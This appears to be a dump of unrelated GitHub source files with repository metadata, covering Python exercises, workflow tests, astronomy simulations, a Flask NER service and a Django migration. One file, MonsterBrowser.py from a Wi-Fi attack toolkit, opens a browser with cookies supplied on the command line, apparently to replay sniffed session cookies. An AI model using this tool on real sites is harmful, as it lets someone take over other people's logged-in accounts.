output += ", which is home to a " + str(boat.get_person())
output += "\n"
for key in boat.connections:
output += "----this boat is connected to boat " + str(key)
output += " which has move condition, " + str(boat.connections[key])
output += "\n"
print output
def play():
#start playing:
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "Welcome to the boat game!"
print "You start at the beach. There are a number of interconnected boats. The goal is to move to Boat 6, a rowboat."
print "Select options using the numbers on your keyboard and press ENTER or RETURN to proceed."
print "Have fun!"
the_player = Player()
while True:
the_player.on_boat_actions()
play() | [
"[email protected]"
]
| |
9ba77a93b34b31c7c184176444d94a568deb7688 | e4d4149a717d08979953983fa78fea46df63d13d | /Week5/Day1/XP.py | 2c661c7abdf2c8897ce0f26c7fbce353061e2d6f | []
| no_license | fayblash/DI_Bootcamp | 72fd75497a2484d19c779775c49e4306e602d10f | a4e8f62e338df5d5671fd088afa575ea2e290837 | refs/heads/main | 2023-05-05T20:55:31.513558 | 2021-05-27T06:48:40 | 2021-05-27T06:48:40 | 354,818,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,863 | py | # # Exercise 1: Cats
# # Instructions
# # Using this class
# class Cat:
# def __init__(self, name, age):
# self.name = name
# self.age = age
# def oldest_cat(cat_list):
# oldest_current=cat_list[0]
# for cat in cat_list:
# if cat.age>oldest_current.age:
# oldest_current=cat
# return oldest_current
# # Instantiate three Cat objects using the code provided above.
# c1=Cat("Roxy",3)
# c2=Cat("Meow",2)
# c3=Cat("Fluffy",4)
# # Outside of the class, create a function that finds the oldest cat and returns the cat.
# all_cats=[c1,c2,c3]
# oldest=oldest_cat(all_cats)
# print(f"{oldest.name} is the oldest cat and she is {oldest.age} years old.")
# # Print the following string: “The oldest cat is <cat_name>, and is <cat_age> years old.”. Use the function previously created.
# # Exercise 2 : Dogs
# # Instructions
# # Create a class called Dog.
# class Dog:
# def __init__(self,name,height):
# self.name=name
# self.height=height
# def bark(self):
# print(f"{self.name} goes woof!")
# # In this class, create an __init__ method that takes two parameters : name and height. This function instantiates two attributes, which values are the parameters.
# # Create a method called bark that prints the following string “<dog_name> goes woof!”.
# # Create a method called jump that prints the following string “<dog_name> jumps <x> cm high!”. x is the height*2.
# def jump(self):
# print(f"{self.name} jumps {self.height*2} cm")
# # Outside of the class, create an object called davids_dog. His dog’s name is “Rex” and his height is 50cm.
# davids_dog=Dog("Rex",50)
# print(davids_dog.name)
# print(davids_dog.height)
# davids_dog.bark()
# davids_dog.jump()
# # Print the details of his dog (ie. name and height) and call the methods bark and jump.
# # Create an object called sarahs_dog. Her dog’s name is “Teacup” and his height is 20cm.
# sarahs_dog=Dog("Teacup",20)
# print(sarahs_dog.name)
# print(sarahs_dog.height)
# sarahs_dog.bark()
# sarahs_dog.jump()
# # Print the details of her dog (ie. name and height) and call the methods bark and jump.
# # Create an if statement outside of the class to check which dog is bigger. Print the name of the bigger dog.
# if sarahs_dog.height>davids_dog.height:
# print(f"{sarahs_dog.name} is bigger.")
# else:
# print(f"{davids_dog.name} is bigger.")
# # Exercise 3 : Who’s The Song Producer?
# # Instructions
# # Define a class called Song, it will show the lyrics of a song.
# class Song:
# def __init__(self,lyrics):
# self.lyrics=lyrics
# # Its __init__() method should have two arguments: self and lyrics (a list).
# # Inside your class create a method called sing_me_a_song that prints each element of lyrics on its own line.
# def sing_me_a_song(self):
# for lyric in self.lyrics:
# print(lyric)
# # Create an object, for example:
# stairway= Song(["There’s a lady who's sure","all that glitters is gold", "and she’s buying a stairway to heaven"])
# # Then, call the sing_me_a_song method. The output should be:
# stairway.sing_me_a_song()
# # There’s a lady who's sure
# # all that glitters is gold
# # and she’s buying a stairway to heaven
# Exercise 4 : Afternoon At The Zoo
# Instructions
# Create a class called Zoo.
class Zoo:
def __init__(self,zoo_name):
self.zoo_name=zoo_name
self.animals=[]
self.list_animals=[]
# In this class create a method __init__ that takes one parameter: zoo_name.
# It instantiates two attributes: animals (an empty list) and name (name of the zoo).
# Create a method called add_animal that takes one parameter new_animal. This method adds the new_animal to the animals list as long as it isn’t already in the list.
def add_animal(self,new_animal):
if new_animal not in self.animals:
self.animals.append(new_animal)
# Create a method called get_animals that prints all the animals of the zoo.
def get_animals(self):
print(self.animals)
# Create a method called sell_animal that takes one parameter animal_sold. This method removes the animal from the list and of course the animal needs to exist in the list.
def sell_animal(self,animal_sold):
if animal_sold in self.animals:
self.animals.remove(animal_sold)
# Create a method called sort_animals that sorts the animals alphabetically and groups them together based on their first letter.
# Example
def sort_animals(self):
self.animals=sorted(self.animals)
# list_animals=[]
temp_list=[self.animals[0]]
for i in range(1,len(self.animals)):
if self.animals[i][0] == temp_list[-1][0]:
temp_list.append(self.animals[i])
else:
self.list_animals.append(temp_list)
temp_list=[]
temp_list.append(self.animals[i])
i+=1
# print(list_animals)
return {v+1: k for v, k in enumerate(self.list_animals)}
def get_groups(self):
for i in self.list_animals:
print(i)
fays_zoo=Zoo("fay")
fays_zoo.add_animal("Bear")
fays_zoo.add_animal("Ape")
fays_zoo.add_animal("Cat")
fays_zoo.add_animal("Emu")
fays_zoo.add_animal("Cougar")
fays_zoo.add_animal("Eel")
fays_zoo.add_animal("Baboon")
fays_zoo.get_animals()
print(fays_zoo.sort_animals())
fays_zoo.get_groups()
# {
# 1: "Ape",
# 2: ["Baboon", "Bear"],
# 3: ['Cat', 'Cougar'],
# 4: ['Eel', 'Emu']
# }
# Create a method called get_groups that prints the animal/animals inside each group.
#
# Create an object called ramat_gan_safari and call all the methods.
# Tip: The zookeeper is the one who will use this class.
# Example
# Which animal should we add to the zoo --> Giraffe
| [
"[email protected]"
]
| |
9e427939fee2e4d3f52f2a70e6743b49bcc4d34e | cc2fcc1a0c5ea9789f98ec97614d7b25b03ba101 | /st2tests/integration/mistral/test_errors.py | 3280859646406164d582cf4022c8c414ea41ca1f | [
"Apache-2.0"
]
| permissive | Junsheng-Wu/st2 | 6451808da7de84798641882ca202c3d1688f8ba8 | c3cdf657f7008095f3c68b4132b9fe76d2f52d81 | refs/heads/master | 2022-04-30T21:32:44.039258 | 2020-03-03T07:03:57 | 2020-03-03T07:03:57 | 244,301,363 | 0 | 0 | Apache-2.0 | 2022-03-29T22:04:26 | 2020-03-02T06:53:58 | Python | UTF-8 | Python | false | false | 6,469 | py | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from integration.mistral import base
class ExceptionHandlingTest(base.TestWorkflowExecution):
def test_bad_workflow(self):
with self.assertRaises(Exception) as t:
self._execute_workflow('examples.mistral-foobar', {})
self.assertIn('Action "examples.mistral-foobar" cannot be found', t.exception.message)
def test_bad_action(self):
execution = self._execute_workflow('examples.mistral-error-bad-action', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution)
self.assertIn('Failed to find action', execution.result['extra']['state_info'])
def test_bad_wf_arg(self):
execution = self._execute_workflow('examples.mistral-error-bad-wf-arg', {})
execution = self._wait_for_completion(
execution,
expect_tasks=False,
expect_tasks_completed=False
)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Invalid input', execution.result['extra']['state_info'])
def test_bad_task_transition(self):
execution = self._execute_workflow('examples.mistral-error-bad-task-transition', {})
execution = self._wait_for_completion(
execution,
expect_tasks=False,
expect_tasks_completed=False
)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn("Task 'task3' not found", execution.result['error'])
def test_bad_with_items(self):
execution = self._execute_workflow('examples.mistral-error-bad-with-items', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Wrong input format', execution.result['extra']['state_info'])
def test_bad_expr_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-expr', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_publish_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-publish', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_subworkflow_input_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-subworkflow-input', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_task_transition_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-task-transition', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_with_items_yaql(self):
execution = self._execute_workflow('examples.mistral-test-yaql-bad-with-items', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate YAQL expression', execution.result['extra']['state_info'])
def test_bad_expr_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-expr', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
# TODO: Currently, Mistral returns "UndefinedError ContextView object has no attribute".
# Need to fix Mistral to return "Cannot evaulate Jinja expression."
# self.assertIn('Can not evaluate Jinja expression',
# execution.result['extra']['state_info'])
def test_bad_publish_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-publish', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
def test_bad_subworkflow_input_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-subworkflow-input', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
def test_bad_task_transition_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-task-transition', {})
execution = self._wait_for_completion(execution)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
def test_bad_with_items_jinja(self):
execution = self._execute_workflow('examples.mistral-test-jinja-bad-with-items', {})
execution = self._wait_for_completion(execution, expect_tasks=False)
self._assert_failure(execution, expect_tasks_failure=False)
self.assertIn('Can not evaluate Jinja expression', execution.result['extra']['state_info'])
| [
"[email protected]"
]
| |
d3a3564a7a3dfa3476aed8c37bc0eefe96e862bd | b54f9fb585648e4fe0b8ca727f42c97a6c1486fd | /variability/varModels.py | 5006e96121da25ab9e80c656b99ff8bf870894bf | []
| no_license | tribeiro/SMAPS | 46a36ab3fd74e35d97d9b43d5d80d88d9581b9da | b1e8dd9444e7fcbc7a82ab30941bab224b5ae600 | refs/heads/master | 2021-01-22T22:35:09.228649 | 2014-05-08T11:19:47 | 2014-05-08T11:19:47 | 19,570,868 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,107 | py |
import numpy as np
###################################################################################################
def ecbinary(time,period,ecduration,depth):
'''
Simulate eclipsing binary.
'''
phase = time / period
cycle = np.ceil(phase)
phase = phase - cycle
mask = np.bitwise_and(phase > -ecduration, phase < ecduration)
flux = np.zeros_like(time)+1.0
flux[mask] -= depth
return flux
###################################################################################################
def pulsating(time,period,amplitude):
'''
Simulate pulsating star.
'''
return np.sin(2*np.pi*time/period)
###################################################################################################
def transient(time,t0,amplitude,duration):
flux = np.zeros_like(time)
mask = time > t0
flux[mask] += amplitude * np.exp(- ((time[mask]-t0) / duration)**2.)
return flux
###################################################################################################
###################################################################################################
if __name__ == '__main__':
import pylab as py
tt = np.arange(10,40,0.1)
#tobs = np.loadtxt( '/Users/tiago/Documents/JPAS/variables/filtersObservations.txt',
# delimiter=',',unpack=True,usecols=(1,))
mag0 = 16
ectobs = np.array([17.0413348326,17.0480014993,26.1886086683,30.3348673002])+np.random.random(1)[0]*10-5
ectobs.sort()
ecflx = mag0-ecbinary(tt,2,0.1,1.5)
ecobs = mag0-ecbinary(ectobs,2,0.1,1.5)
ecerr = np.random.exponential(0.1,len(ectobs)) * (-1)**np.random.randint(0,2,len(ectobs))
pltobs = np.array([17.0413348326,17.0480014993,26.1886086683,30.3348673002])+np.random.random(1)[0]*10-5
pltobs.sort()
plflx = mag0-pulsating(tt,2,0.5)
plobs = mag0-pulsating(pltobs,2,0.5)
plerr = np.random.exponential(0.1,len(pltobs)) * (-1)**np.random.randint(0,2,len(pltobs))
trtobs = np.array([17.0413348326,17.0480014993,26.1886086683,30.3348673002])+np.random.random(1)[0]*10-5
trtobs.sort()
trflx = mag0-transient(tt,20,1.0,10)+transient(tt,600,10.0,40)
trobs = mag0-transient(trtobs,20,1.0,10)+transient(trtobs,600,10.0,40)
trerr = np.random.exponential(0.1,len(trtobs)) * (-1)**np.random.randint(0,2,len(trtobs))
py.figure(1,figsize=(8,4))
########################
ax1 = py.subplot(311)
py.plot(tt,ecflx,'-')
py.errorbar(ectobs,ecobs+ecerr,0.1,fmt='o')
py.ylim(17.499,14.5)
ax2 = py.subplot(312)
py.plot(tt,plflx,'-')
py.errorbar(pltobs,plobs+plerr,0.1,fmt='o')
py.ylim(17.5,14.5)
ax3 = py.subplot(313)
py.plot(tt,trflx,'-')
py.errorbar(trtobs,trobs+trerr,0.1,fmt='o')
py.ylim(17.5,14.501)
########################
py.setp(ax1.get_xticklabels(),visible=False)
py.setp(ax2.get_xticklabels(),visible=False)
ax3.set_xlabel('Time (days)')
ax2.set_ylabel('Magnitude')
py.subplots_adjust(hspace=0,wspace=0,bottom=0.13,top=0.93)
#py.savefig('/Users/tiago/Dropbox/Apps/TeX Writer (1)/fig/jpas_variability_fig01.pdf')
py.show()
################################################################################################### | [
"[email protected]"
]
| |
4fcd282d60d9e4ac0828e7919689e02b66cd375e | b27f7fcd08a64b4b3ae323c2c11fc3b0df41f323 | /EXECUTABLES/FINALES/Graphing_PDA_mesh.py | 5d6d61fb5e3eb1ade1656a5bf8c2263e6539eccf | []
| no_license | juancotrino/Drought-analysis-functions | ec584e143510817aa81e265d2aac1ca19195f941 | 9a35a343232987bcbeea922ae3393d1103846aa5 | refs/heads/master | 2023-07-16T01:27:51.512523 | 2021-08-17T19:45:08 | 2021-08-17T19:45:08 | 388,537,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Nov 21 19:04:33 2020
@author: juan.cotrino
"""
from Hapi.datagraphing import ColorMeshPDAGraphing
analysis = "NCDA"
variables = ['runoff', 'soil_moisture']
percentiles = [60, 65, 70, 75, 80, 85, 90, 95]
main_path = "E:/JC_FA_TESIS/"
dst_path = main_path + "Datos/Images/"
for variable in variables:
for percentile in percentiles:
db_path = main_path + "Datos/DBs/NCDA_CDA/perc_" + str(percentile) + "/" + analysis + "/" + variable + "/drought_binary_" + variable + "_perc_" + str(percentile) + ".pickle"
ColorMeshPDAGraphing(variable,
percentile,
db_path,
analysis,
dst_path=dst_path)
| [
"[email protected]"
]
| |
c02c67a431312e3b0710cf872c3477faeee8222e | f21ea752700b3afa0729bfa6520ab1c6702e6189 | /tools/graph_bag/scripts/poses.py | c92f7140d19b516cf9465625ffc36620dbebdbad | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"LicenseRef-scancode-philippe-de-muyter",
"MIT",
"MPL-2.0",
"MPL-1.0",
"LGPL-2.1-or-later",
"Apache-2.0",
"LGPL-2.1-only",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-proprietary-license",
"LGPL-3.0-only",
"CC-BY-NC-4.0",
"GPL-3.0-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla"
]
| permissive | SemaSandbox/astrobee | 01594a46c80d8730be6f5ef753b44ab67a178f1d | e09fba15f241ce044e9b66d19a4767b547c2b720 | refs/heads/master | 2023-07-17T00:21:03.560819 | 2021-07-22T18:46:14 | 2021-07-22T18:46:14 | 391,620,249 | 1 | 0 | Apache-2.0 | 2021-08-01T17:12:56 | 2021-08-01T12:24:35 | null | UTF-8 | Python | false | false | 1,806 | py | #!/usr/bin/python
#
# Copyright (c) 2017, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
#
# All rights reserved.
#
# The Astrobee platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import vector3ds
import orientations
import scipy.spatial.transform
class Poses(object):
def __init__(self, pose_type, topic):
self.positions = vector3ds.Vector3ds()
self.orientations = orientations.Orientations()
self.times = []
self.pose_type = pose_type
self.topic = topic
def add_pose(self, pose_msg, timestamp, bag_start_time=0):
self.positions.add(pose_msg.position.x, pose_msg.position.y, pose_msg.position.z)
euler_angles = scipy.spatial.transform.Rotation.from_quat(
[pose_msg.orientation.x, pose_msg.orientation.y, pose_msg.orientation.z,
pose_msg.orientation.w]).as_euler('ZYX', degrees=True)
self.orientations.add(euler_angles[0], euler_angles[1], euler_angles[2])
self.times.append(timestamp.secs + 1e-9 * timestamp.nsecs - bag_start_time)
def add_msg(self, msg, timestamp, bag_start_time=0):
self.add_pose(msg.pose, timestamp, bag_start_time)
def position_vector(self, index):
return [self.positions.xs[index], self.positions.ys[index], self.positions.zs[index]]
| [
"[email protected]"
]
| |
7acf5941940c678da4795277f2ddd08749ad98a3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03192/s975847643.py | 0b87008f474274d7ec53b07ee4ec58d374c6d871 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | n = int(input())
li = []
while n > 0:
li.append(n%10)
n //= 10
li.reverse()
ans = 0
for i in range(len(li)):
if li[i] == 2:
ans += 1
print(ans) | [
"[email protected]"
]
| |
3257da756aabaa07ff821be59ed27b2379fb07f9 | b70657d1f96de8a267cb14a80fd4eb8df56d479f | /screaper_language_model/application/application.py | 6f78ce85467368f264f3647a9de1ff2790b26248 | []
| no_license | yenicelik/screaper | 8ea7e6064f85907edb9ee0261054d35bf1a38758 | de1f194b1dde3b0815e87ddbf5f1906badaf02a6 | refs/heads/main | 2023-04-23T19:10:13.800691 | 2021-05-11T21:13:36 | 2021-05-11T21:13:36 | 316,816,684 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,902 | py | """
Runs the Flask application
"""
import time
from flask import Flask, jsonify
from flask import request
from screaper_language_model.language_models.bert_multilang_ner import model_ner
application = Flask(__name__)
@application.route('/')
def healthcheckpoint():
return 'Multilingual BERT model up and running for Named Entity Recognition (NER)'
@application.route('/get-named-entities', methods=['GET', 'POST'])
def get_named_entities():
"""
Example request looks as follows:
{
"documents": [
"Bob Ross lived in Florida",
"I like big cookies and I cannot lie"
]
}
:return:
"""
start_time = time.time()
try:
req_data = request.get_json(force=True)
print("req data is: ", req_data)
except Exception as e:
return jsonify({
"errors": ["Input data not understood", e]
})
if "documents" not in req_data:
return jsonify({
"errors": ["Input does not contain 'documents' key", req_data]
})
if len(req_data["documents"]) == 0:
return jsonify({
"errors": ["'documents' key does not contain any data", req_data]
})
if not isinstance(req_data["documents"], list):
return jsonify({
"errors": ["'documents' key is not a list", req_data]
})
for x in req_data["documents"]:
if not isinstance(x, str):
return jsonify({
"errors": ["'documents' key does not contain string data", x]
})
try:
queries = req_data["documents"]
except Exception as e:
return jsonify({
"errors": ["Other exception occured", e]
})
out = model_ner.predict(queries)
print("Request took {} seconds", time.time() - start_time)
return jsonify({
"response": out
})
| [
"[email protected]"
]
| |
29b9663bb72f21946ffdb20c501c498e7c0cfee6 | f2e09eea7c995df2cac15f16ae5eeb79b6fc748c | /odmltools/info.py | cda1f635ddc615fb0e6c0b291916d4bb2d05c164 | [
"BSD-2-Clause"
]
| permissive | mpsonntag/odmltools | 676d829212ababd3ea3eb3396f25d0df8f3a4373 | 87e67fc737fbad2bd9866d529d47abbc2b7115d1 | refs/heads/master | 2021-07-13T07:54:23.214505 | 2021-06-21T18:11:19 | 2021-06-21T18:11:19 | 221,953,387 | 0 | 0 | null | 2019-11-15T15:40:14 | 2019-11-15T15:40:14 | null | UTF-8 | Python | false | false | 357 | py | import os
import json
INSTALL_PATH = os.path.dirname(__file__)
with open(os.path.join(INSTALL_PATH, "info.json")) as infofile:
infodict = json.load(infofile)
VERSION = infodict["VERSION"]
AUTHOR = infodict["AUTHOR"]
COPYRIGHT = infodict["COPYRIGHT"]
CONTACT = infodict["CONTACT"]
HOMEPAGE = infodict["HOMEPAGE"]
CLASSIFIERS = infodict["CLASSIFIERS"]
| [
"[email protected]"
]
| |
d923a0a51782d5961b136ff66825a74783eacae5 | d7f4a9f8a525e03fa8811c4a6f4b945dda79adb4 | /deep-learning-course/numerical-stability.py | c3162d2c4b8a73fd12ffe438aa1acce62867ec65 | []
| no_license | sebastianmontero/tensorflow | 3caffb968a403898deb39505041db8b0ce318ca4 | d02be076a03460dd38afa8ccadebbc4afff8ee22 | refs/heads/master | 2020-03-17T03:10:24.959450 | 2018-07-25T09:47:00 | 2018-07-25T09:47:00 | 133,223,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 63 | py | a = 1
for i in range(1000000):
a += .000001
a-= 1
print(a) | [
"[email protected]"
]
| |
8845672ea92d7bddefee80d4f9a40864a8f36823 | bb198232df12a1adb9e8a6164ff2a403bf3107cf | /cookie-monster/MonsterBrowser.py | da21df7b654d09e613e51a1984046a21401e3364 | []
| no_license | vanello/wifi-arsenal | 9eb79a43dfdd73d3ead1ccd5d2caf9bad9e327ee | 1ca4c5a472687f8f017222893f09a970652e9a51 | refs/heads/master | 2021-01-16T22:00:37.657041 | 2015-09-03T03:40:43 | 2015-09-03T03:40:43 | 42,060,303 | 1 | 0 | null | 2015-09-07T15:24:11 | 2015-09-07T15:24:11 | null | UTF-8 | Python | false | false | 3,179 | py | from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
from PyQt4.QtNetwork import *
import getopt
import sys
import re
class MyBrowser(QWebView):
def __init__(self,father=None):
super(MyBrowser, self).__init__(father)
self.page().setLinkDelegationPolicy(QWebPage.DelegateExternalLinks)
self.connect(self, SIGNAL("linkClicked(QUrl)"), self.onLinkClicked)
def onLinkClicked(self, url):
self.load(url)
class MonsterWindow(QWidget):
def __init__(self, father = None):
super(MonsterWindow, self).__init__(father)
class MonsterBrowser():
urlPat = re.compile("https?://([^/]*)(.*)")
def usage(self):
print """
Usage: python MonsterBrowser.py [options] url
Options:
-c --cookie <Cookie> set cookie
-u --useragent <UserAgent> set useragent
"""
def parseArguments(self, argv):
try:
opts, args = getopt.getopt(argv, "c:u:", ["cookie=", "useragent="])
except getopt.GetoptError:
self.usage()
sys.exit(2)
if len(args) < 1:
self.usage()
sys.exit(2)
url = args[0]
cookie = None
useragent = None
for opt, args in opts:
if opt in ("-c", "--cookie"):
cookie = args
if opt in ("-u", "--useragent"):
useragent = args
if useragent is None:
useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1"
print cookie, useragent, url
self.launch(cookie, useragent, url)
def launch(self, rawcookie, useragent, url):
'''
url: http://xxx.yyy.zzz/aaa/bbb?ccc/
host: xxx.yyy.zzz
domain: yyy.zzz
'''
cookies = []
# if no http protocol header, append it
if not url.startswith("http://"):
url = "http://" + url
match = self.urlPat.match(url)
host = match.group(1)
uri = match.group(2)
domain = ".".join(host.split(".")[-2:])
# adding cookies to cookiejar
for cookie in rawcookie.split(";"):
qnc = QNetworkCookie()
qnc.setDomain("."+domain)
key = cookie.split("=")[0]
value = "=".join(cookie.split("=")[1:])
qnc.setName(key)
qnc.setValue(value)
cookies.append(qnc)
self.open_web(url, cookies, useragent)
return
def open_web(self, url, cookies, useragent):
app = QApplication(sys.argv)
wind = QMainWindow()
view = MyBrowser()
nam = QNetworkAccessManager()
view.page().setNetworkAccessManager(nam)
print " [!] Spawning web view of " + url
ncj = QNetworkCookieJar()
ncj.setAllCookies(cookies)
nam.setCookieJar(ncj)
qnr = QNetworkRequest(QUrl(url))
qnr.setRawHeader("User-Agent", useragent)
view.load(qnr)
wind.setCentralWidget(view)
wind.show()
app.exec_()
if __name__ == "__main__":
browser = MonsterBrowser()
browser.parseArguments(sys.argv[1:])
| [
"[email protected]"
]
| |
098cf31e7e9c93028c892ae06068757816c156b8 | bc777bb292712419ffb683aeb07136c9ab68e11e | /src/common/calculate_accuracy.py | 07b9e0120d2cacadb77e65d4fc5078a482f0efc1 | []
| no_license | andrea-w/470project | b292f1c2e26e295fd3a7b3ce5cb0c4ec16d16d1c | 2460a293460fc53df6ea8ed133eca857a6fefe94 | refs/heads/master | 2023-07-23T20:41:54.281914 | 2019-08-02T09:53:56 | 2019-08-02T09:53:56 | 197,472,360 | 0 | 0 | null | 2023-07-06T21:39:30 | 2019-07-17T22:33:09 | Python | UTF-8 | Python | false | false | 2,676 | py | """
Creates new pandas DataFrame for each candidate, consisting of candidate's id and
the candidate's Mean Squared Error (MSE) in predicting test scores.
The fitness function consists of Mean Squared Error values in candidate's accuracy
in predicting scores. An additional column is inserted into the DataFrame with the
normalized MSE for each candidate, for use in determining probability and pairing for
reproduction.
"""
import pandas as pd
import math
import config
# creates a new dataframe to store the fitness function value for each candidate genotype
# compared to the actual test scores for the PK (state,year)
def calculate_accuracy(predicted_scores_df):
list_of_dfs = []
for c in range(1, config.NUM_CANDIDATES_PER_GENERATION + 1):
candidate_predictions = predicted_scores_df.loc[str(c),:]
candidate_dict = find_avg_mse_by_test(candidate_predictions)
s = pd.DataFrame.from_dict(data=candidate_dict)
list_of_dfs.append(s)
accuracy_df = pd.concat(list_of_dfs, axis=1)
accuracy_df.index = ['AVG_MSE_MATH_4_SCORE', 'AVG_MSE_MATH_8_SCORE', 'AVG_MSE_READING_4_SCORE', 'AVG_MSE_READING_8_SCORE']
# the maximum possible MSE is equal to the square of the range of the test (500)
max_MSE = 500**2
# replace all 'NaN's in accuracy_df with max_MSE, since numerical values are needed later
# and 'NaN' value means that the candidate failed to predict any scores for the selected test type,
# which can be considered equivalent to the candidate achieving the maximum possible MSE
accuracy_df.fillna(max_MSE, inplace=True)
# append column to accuracy_df that is the sum of all columns for each row (summing over column axis)
sums = pd.DataFrame(data=accuracy_df.sum(axis=1),columns=['SUM-OF-ROW'])
accuracy_df = accuracy_df.assign(sum_of_row = sums)
# TODO delete writing to csv file - helpful for debugging
with open('accuracy.csv', 'w', newline='') as f:
accuracy_df.to_csv(f)
return accuracy_df
# calculates the MSE for a given candidate, grouped by test name
# returns a dict where key is the candidate_id, and value is the list of average MSEs
# @params: candidate_pred_df - a splice of the predicted_scores_df focused on one candidate
def find_avg_mse_by_test(candidate_pred_df):
test_names = ['AVG_MATH_4_SCORE', 'AVG_MATH_8_SCORE', 'AVG_READING_4_SCORE', 'AVG_READING_8_SCORE']
avg_mse = []
for t in test_names:
candidate_test_df = candidate_pred_df[candidate_pred_df['TEST-NAME'] == t]
avg_mse.append(candidate_test_df['MEAN-SQUARE-ERROR'].mean())
cand_dict = {str(candidate_pred_df.index[0]): avg_mse}
return cand_dict | [
"[email protected]"
]
| |
4dc5f5ab20f58f3e95d3b45ee001dd6316e8658c | 0641f003eb983c95fa8f4577e8894e69f107aa0e | /backend/apps/shop/migrations/0001_initial.py | e157aa70a4695cc81665981ece99b1d18c4cdb7a | []
| no_license | davidkwan95/bri2016-backend | d61929086d5a46849477a6b6c93c002c221340ad | f33b9e2b3b5526385949bcb5e987ad7933016de1 | refs/heads/master | 2020-05-29T08:40:41.982377 | 2016-10-01T00:12:46 | 2016-10-01T00:12:46 | 69,886,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,707 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-30 23:18
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(max_length=20)),
('total_price', models.IntegerField(null=True)),
('date_created', models.DateField()),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='OrderLine',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quantity', models.IntegerField()),
('unit_cost', models.IntegerField()),
('line_price', models.IntegerField()),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lines', to='shop.Order')),
],
),
